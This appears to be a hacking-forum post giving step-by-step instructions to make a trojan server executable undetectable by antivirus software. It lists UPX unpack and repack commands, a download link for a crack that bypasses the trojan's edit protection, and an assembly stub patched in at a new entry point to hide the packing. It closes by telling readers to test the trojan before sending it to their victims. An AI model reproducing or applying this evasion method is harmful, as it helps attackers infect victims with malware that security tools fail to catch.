Step 1: Download UPX v1.25 from http://upx.sourceforge.net
Step 2: Decompress the server. (upx -d server.exe)
Step 3: Download Furtif_00's AWESOME crack to bypass the edit protection from http://ch.ti.hack.site.voila.fr/ProPatch.exe
Step 4: Apply the patch. (propatch server.exe)
Step 5: Repack the server with UPX. (upx -9 server.exe)
Step 6: Open server.exe in a disassembler and go to the address of the OEP (Entrypoint + Image Base = OEP). If you do not know what I am talking about read about the PE file format first (and about assembly Cool). You should see something like "60 pushad". Scroll down a few pages until you see plenty of "00 add [eax],al". At this address you write the following commands which will prevent the Anti Virus systems from detecting that the file is UPX packed (and the AV's won't decode it in memory):
Quote:
push "address of the OEP" <== Patchaddress
push eax
pushfd
pushad
call "address of the next command (which is "retn 28")"
retn 28
inc ecx <==New program entrypoint
loop "Patchaddress"
(from governmentsecurity.org)
Step 7: Change the programs entrypoint to our new one in the PE header. You can do this with a hex editor or with some other tools.
Step 8: Scan the server (which should be undetectable now) and you had better test it before sending it to your victims. Smile
This patch can be used for all other trojans too. (Skip the cracking step)
Enjoy your undetectable server!!
gal kas bandet ar pawyko??? pac nenoriu bandyt ( per dauk tyngiu)
